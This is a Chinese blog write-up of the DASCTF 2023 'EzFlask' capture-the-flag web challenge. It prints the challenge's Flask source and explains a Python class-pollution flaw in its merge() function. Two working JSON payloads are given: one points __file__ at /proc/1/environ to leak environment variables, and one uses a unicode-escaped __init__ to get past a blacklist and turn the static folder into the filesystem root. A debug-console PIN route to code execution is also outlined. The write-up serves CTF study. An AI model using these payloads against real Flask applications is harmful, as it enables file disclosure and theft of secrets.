DASCTF 2023 & 0X401七月暑期挑战赛 web题 EzFlask

最新推荐文章于 2024-05-23 22:07:18 发布
最新推荐文章于 2024-05-23 22:07:18 发布
阅读量218 收藏 1
点赞数 1
分类专栏: CTF DASCTF 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63138919/article/details/132591908
版权
CTF 同时被 2 个专栏收录
24 篇文章 0 订阅
订阅专栏
DASCTF
2 篇文章 0 订阅
订阅专栏

EzFlask

看源码,有注册和登入两个路由

mport uuid

from flask import Flask, request, session
from secret import black_list
import json

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())

def check(data):
    for i in black_list:
        if i in data:
            return False
    return True

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

class user():
    def __init__(self):
        self.username = ""
        self.password = ""
        pass
    def check(self, data):
        if self.username == data['username'] and self.password == data['password']:
            return True
        return False

Users = []

@app.route('/register',methods=['POST'])
def register():
    if request.data:
        try:
            if not check(request.data):
                return "Register Failed"
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Register Failed"
            User = user()
            merge(data, User)
            Users.append(User)
        except Exception:
            return "Register Failed"
        return "Register Success"
    else:
        return "Register Failed"

@app.route('/login',methods=['POST'])
def login():
    if request.data:
        try:
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Login Failed"
            for user in Users:
                if user.check(data):
                    session["username"] = data["username"]
                    return "Login Success"
        except Exception:
            return "Login Failed"
    return "Login Failed"

@app.route('/',methods=['GET'])
def index():
    return open(__file__, "r").read()

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5010)

代码解释:

1.导入所需模块:

  • uuid:用于生成Flask应用程序的随机密钥。
  • Flaskrequestsession来自flask包:这些模块用于创建Web应用程序、处理HTTP请求和管理用户会话。
  • secret中的black_list:假设black_list包含敏感词汇列表。

2.设置Flask应用程序和密钥:

  • 创建一个Flask应用程序对象,并为其设置一个随机生成的密钥,这个密钥用于保护会话数据的安全性。

3.定义一个user类:

  • 该类包含了usernamepassword属性,并有一个check方法,用于检查用户输入的数据是否与当前实例的用户名和密码匹配。

 

 

4.定义了三个路由(route):

  • /register:处理用户注册的POST请求。
  • /login:处理用户登录的POST请求。
  • /:处理GET请求,用于显示当前代码文件的内容。

看到merge()函数  那么就可以使用Python原型链污染

具体内容可以看大佬文章:

https://www.cnblogs.com/Article-kelp/p/17068716.html

非预期解法:
第一种,通过file属性直接读取环境变量

__file__是从中加载模块的文件的路径名(如果它是从文件加载的)。__file__对于静态链接到解释器的C模块,该属性不存在。对于从共享库动态加载的扩展模块,它是共享库文件的路径名。

在您的情况下,模块正在__file__全局名称空间中访问其自己的属性。

因为__init__被ban了,所以可以利用全局变量直接使file为存储环境变量的文件

payload;

{
    "username":"a",
    "password":"b",
    "__class__":{
        "check":{
            "__globals__":{
                "__file__" : "/proc/1/environ"
            }
        }
    }
}
 

 

通过/路由可以看出,该路由直接通过__file__属性来读取文件并进行输出,所以直接访问就可以了

第二种,static静态目录污染

_static_url_path
这个属性中存放的是flask中静态目录的值,默认该值为static。访问flask下的资源可以采用如http://domain/static/xxx,这样实际上就相当于访问_static_url_path目录下xxx的文件并将该文件内容作为响应内容返回
 

所以我们可以直接构造payload来进行污染,题目过滤掉了__init__,但是check之后经历了一次json.loads,而且json识别unicode,所以我们可以通过Unicode编码进行绕过

payload: 

{
    "__init\u005f_":{
        "__globals__":{
            "app":{
                "_static_folder":"/"
            }
        }
    },
    "username":1,
    "password":1
}
 

构造之后_static_folder的值就变成根目录了 

然后可以读取环境变量来得到flag

预期解法

题目是开启了flask的debug模式,访问console控制台,然后配合任意文件读取来计算PIN码,最后进行RCE

W3nd4L0v3
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细解wp
Jay17的博客
08-05 1227
DASCTF 2023 & 0X401七月暑期挑战赛 Web方向 EzFlask ez_cms MyPicDisk 详细解wp
打印机共享0x00000709错误修复2021年10月补丁修复win7-32打印问
06-23
目前测试中发现,如果是Win7-64与Win7-32安装了9月14 日之后的ESU收费补丁,同样会受到影响。 此问是由于微软更新的补丁中的安全机制导致。和9月份出现的打印机共享0x0000011b错误原因基本一样。
0x-tracker-client:React单页应用程序,为0x Tracker的前端提供动力
02-05
0x跟踪器客户端 使用React构建的单页应用程序,提供了一个界面,用于浏览来自0x Tracker API的数据。 内容 :male_sign: 要求 虽然该应用程序在作为静态Web应用程序提供,但如果要构建应用程序源,则需要安装 为了方便使用提供了.nvmrc文件。 它也建议您使用和编辑器插件,如果参与该项目。 预提交钩子到位,可以防止提交不符合Prettier / ESLint规则的代码。 :hatching_chick: 入门 该项目已配置为可以与配合使用,因此入门非常简单。 运行以下终端命令以安装依赖项,配置您的环境并启动开发服务器: $ npm install $ cp .env.example .env $ npm
第三届全国大学生算法设计与编程挑战赛
04-15
第三届全国大学生算法设计与编程挑战赛 只有:B,D,E,G,I,K,L 正⽂ B: 思路:⼆分 ⼆分给出⼀个mid,让第⼀个数 r 为max(a[1]-d,0),以后的数⾄少是 r+1,⽽且太⼩就直接返回NO,也就是 if( a[i]-mid < r+1) return 0; 因为递增,r最⼩为 r+1。因为差值⼩于mid,r最⼩为 a[i]-mid ,所以 r=max(r+1,a[i]-mid); 总代码: 1 int check(int d){ 2 int r=max(0,a[1]-d); 3 fo(2,n){ 4 if(a[i]+d<r+1) return 0; 5 r=max(r+1,a[i]-d); 6 } 7 return 1; 8 } 1 #include<iostream> 2 #include<algorithm> 3 using namespace std; 4 #define fo(a,b) for(int i=a;i<=b;i++) 5 #define inf 0x3f3f3f3f 6 #define ll long long 7 #define M 10000
HZNUCTF-ezflask
qq_44640313的博客
03-27 541
jinja2的注入
SSTI Flask做记录1
Firebasky的博客
10-12 985
这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下 1. ezflask hdctfezflask地址 这个比较简单,直接一层一层的去找一找利用的类和函数就可以啦 记录一下自己的步骤: 1.{{''.__class__}} # 获得单引号的类型 2.{{''.__class__.__base__}} #获得object 3.{{''.__class__.__base__.__subclasses__()}}#获得基类 4.{{''.__class__.__.
buuctf--easyflask
qq_46263951的博客
01-04 857
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
HZNUCTF2023 web
weixin_63231007的博客
05-07 1288
HZNUCTF校赛 赛后复现
HSCSEC 2023 个人练习
weixin_44770698的博客
02-19 701
HSCSEC 2023 练习
蓝桥杯大赛选拔赛试解析,供大家学习研究参考
11-16
第2 已定义:int a = 02023, b = 0x212; a + b 的值是( )。 A. 八进制数4771 B. 十进制数1573 C. 十进制数2553 D. 十六进制数9f9 答案:B 解析:首先a转二进制为:0100 0001 0011 b转二进制为:0010 ...
2023年HW蓝队面试
04-26
0x01 Hvv的分组和流程 HW分为蓝队和红队,红队为常说的攻击队,蓝队为防守队。蓝队一般分为初级监测组,中级研判组,高级应急溯源组; 流程介绍:一般开始前会进行资产梳理,并通过漏洞扫描,渗透测试以及基线检查等...
PHP 中关于ord($str)>0x80的详细说明
10-27
为了识别双字节的字符,比如汉字或日文韩文等都是占两字节的,每字节高位为1,而一般西文字符只有一个字节,七位有效编码,高位为0而0x80对应的二进制代码为1000 0000,最高位为一,代表汉字.汉字编码格式通称为10格式. ...
FLASK安装--兼收EZ_INSTALL及PIP
weixin_34349320的博客
04-21 70
参考URL: http://www.cnblogs.com/haython/p/3970426.html http://www.pythondoc.com/flask/installation.html#installation   easy_install和pip都是用来下载安装Python一个公共资源库PyPI的相关资源包的 首先安装easy_install 下载地址:https:...
[DASCTF7月赛](未完待续~)
leekos的博客,分享web安全相关知识~
07-24 143
2023DASCTF7月赛
GACTF2020 simpleflask& EZFLASK
汗的博客
09-03 1353
信息收集 直接访问,提示方法不允许 使用burpsuite,右键-change request method 提示了个name,猜测是参数 因为目是flask,容易想到ssti,直接试name={{2*2}} 再试,因为可能是有过滤、waf之类的name={{2-2}},可以看到2-2有了结果 可以确定是存在ssti的,接下来就是具体的bypass和get flag了 bypass&利用 用burp进行一次fuzz,还做不到颅内ctf,以下是一个简单的fuzz字符list [ ] ( \
DASCTF 2023 & 0X401七月暑期挑战赛web复现
weixin_63231007的博客
08-02 1024
python原型链污染&xpath注入&pearcmd文件包含&django框架
Flask(四)
qq_60381063的博客
09-11 242
2,session:session和cookie的作用有点类似,都是为了存储用户相关的信息,不同的是,cookie是存储在本地浏览器,session是一个思路、一个概念、一个服务器存储授权信息的解决方案,不同的服务器,不同的框架,不同的语言有不同的实现,虽然实现不同,但是他们的目的都是服务器为了方便存储数据的,session的出现,是为了解决cookie存储数据不安全的问。wtforms表单的两个主要功能是验证用户提交数据的合法性以及渲染模板,当然还包括一些其他功能:CSRF保护、文件上传等。
网络安全之BGP详解
最新发布
m0_65858385的博客
05-23 1299
在IBGP协议里邻居关系建立或路由传递时,只能在直连之间传递(大多数用的组播更新,组播更新地址用的是224.0.0.X,而224.0.0.X的地址用的TTL值默认为1,所以不能跨网段传递路由,而BGP为什么行可以跨网段传递,是因为它是基于TCP的,TCP是要进行三次握手的,即只要两个IP之间能相互通信,就能进行三次握手,能够三次握手BGP就能传路由,跟中间传递的路由器没有关系,对于中间的路由器而言,它们只知道传递的是点对点的TCP数据包,而实质上这里面承载着BGP的路由信息)。
i&0x01 i&0x02 i&0x04什么意思
06-15
i&0x01, i&0x02 和 i&0x04 是位运算,用于判断 i 的二进制表示中的某一位是否为 1。其中,0x01、0x02 和 0x04 是十六进制数,表示二进制数 00000001、00000010 和 00000100。按位与运算符 & 的规则是:两个二进制位都为 1 时,结果才为 1,否则为 0。因此,i&0x01 的结果就是 i 的二进制表示的最低位(即个位)是否为 1;i&0x02 的结果就是 i 的二进制表示的次低位(即十位)是否为 1;i&0x04 的结果就是 i 的二进制表示的第三位(即百位)是否为 1。如果某一位为 1,则结果为非零数,否则为 0。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值